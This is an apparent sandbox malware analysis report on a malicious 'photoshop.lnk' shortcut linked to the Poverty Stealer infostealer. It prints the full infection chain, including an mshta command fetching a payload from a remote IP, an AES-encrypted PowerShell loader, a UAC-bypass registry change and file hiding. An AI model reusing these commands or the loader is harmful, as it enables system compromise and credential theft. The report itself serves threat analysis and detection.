Malware Analysis Report

2024-10-23 17:19

Sample ID 240304-wa5l3she88
Target photoshop.lnk
SHA256 05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28
Tags
povertystealer evasion stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28

Threat Level: Known bad

The file photoshop.lnk was found to be: Known bad.

Malicious Activity Summary

povertystealer evasion stealer trojan

Detect Poverty Stealer Payload

UAC bypass

Poverty Stealer

Blocklisted process makes network request

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Views/modifies file attributes

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-04 17:44

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-04 17:44

Reported

2024-03-04 17:46

Platform

win7-20240221-en

Max time kernel

121s

Max time network

121s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2204 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 2204 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 2204 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 2640 wrote to memory of 2808 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2808 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2808 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 2680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 2808 wrote to memory of 2680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 2808 wrote to memory of 2680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 2680 wrote to memory of 2592 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2592 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 2592 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 2708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 2708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 2708 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

Network

Country Destination Domain Proto
NL 91.92.251.35:80 91.92.251.35 tcp

Files

memory/2808-40-0x000000001B790000-0x000000001BA72000-memory.dmp

memory/2808-41-0x0000000002310000-0x0000000002318000-memory.dmp

memory/2808-42-0x0000000002D64000-0x0000000002D67000-memory.dmp

memory/2808-45-0x0000000002D6B000-0x0000000002DD2000-memory.dmp

memory/2808-44-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

memory/2808-43-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c8c5cb2ab84faebc7a291645b4de7902
SHA1 9d8b8dcc1fe8750a9a91046a8c536c9f6c799151
SHA256 4b006d30021c45aceaea203589686ceac66a233bba36fc61872f97d75bd858f2
SHA512 42c978a2ced1bd0bff6b4d2d6d65c75cbe1b8706e7f0e98a50e17613ffeb684000a5a8758317b400a21c787e852ca97598e5aeb908fbd5f2f5dedb7d5d3dcda5

memory/2592-53-0x000000001B630000-0x000000001B912000-memory.dmp

memory/2592-59-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

memory/2592-58-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2592-57-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2592-60-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2592-56-0x0000000001E00000-0x0000000001E08000-memory.dmp

memory/2592-55-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2592-54-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

memory/2708-66-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

memory/2708-67-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2708-69-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

memory/2708-70-0x0000000002DB4000-0x0000000002DB7000-memory.dmp

memory/2708-68-0x0000000002DBB000-0x0000000002E22000-memory.dmp

memory/2708-71-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

memory/2592-72-0x000007FEF4F20000-0x000007FEF58BD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-04 17:44

Reported

2024-03-04 17:46

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk

Signatures

Detect Poverty Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Poverty Stealer

stealer povertystealer

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Photoshop.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3152 set thread context of 4496 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 848 wrote to memory of 1180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 848 wrote to memory of 1180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 1180 wrote to memory of 1300 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1180 wrote to memory of 1300 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1300 wrote to memory of 3668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 1300 wrote to memory of 3668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 3668 wrote to memory of 4796 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 4796 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4796 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4796 wrote to memory of 1344 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1344 wrote to memory of 4108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Photoshop.exe
PID 1344 wrote to memory of 4108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Photoshop.exe
PID 1344 wrote to memory of 4108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Photoshop.exe
PID 4108 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Roaming\Photoshop.exe C:\Windows\system32\cmd.exe
PID 4108 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Roaming\Photoshop.exe C:\Windows\system32\cmd.exe
PID 2364 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2364 wrote to memory of 960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 2364 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 1680 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 1680 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 2904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 2904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 3220 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 3220 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 2364 wrote to memory of 2164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2364 wrote to memory of 2164 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2364 wrote to memory of 3152 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
PID 2364 wrote to memory of 3152 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
PID 2364 wrote to memory of 3152 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
PID 3152 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3152 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3152 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3152 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3152 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

C:\Users\Admin\AppData\Roaming\Photoshop.exe

"C:\Users\Admin\AppData\Roaming\Photoshop.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p125762329330388294023250819845 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "nmYIeCI7gcMH.exe"

C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe

"nmYIeCI7gcMH.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto
NL 91.92.251.35:80 91.92.251.35 tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 189.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 35.251.92.91.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
NL 91.92.251.35:80 91.92.251.35 tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 joxi.net udp
US 104.21.73.118:80 joxi.net tcp
US 104.21.73.118:443 joxi.net tcp
US 8.8.8.8:53 118.73.21.104.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
DE 146.70.169.164:2227 tcp
US 8.8.8.8:53 164.169.70.146.in-addr.arpa udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4tgrsvrz.gcm.ps1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1300-9-0x00000238AE880000-0x00000238AE8A2000-memory.dmp

memory/1300-10-0x00007FFB16470000-0x00007FFB16F31000-memory.dmp

memory/1300-11-0x00000238927D0000-0x00000238927E0000-memory.dmp

memory/1300-12-0x00000238927D0000-0x00000238927E0000-memory.dmp

memory/1300-15-0x00007FFB16470000-0x00007FFB16F31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4796-31-0x00007FFB15730000-0x00007FFB161F1000-memory.dmp

memory/4796-32-0x000001EEE4E30000-0x000001EEE4E40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
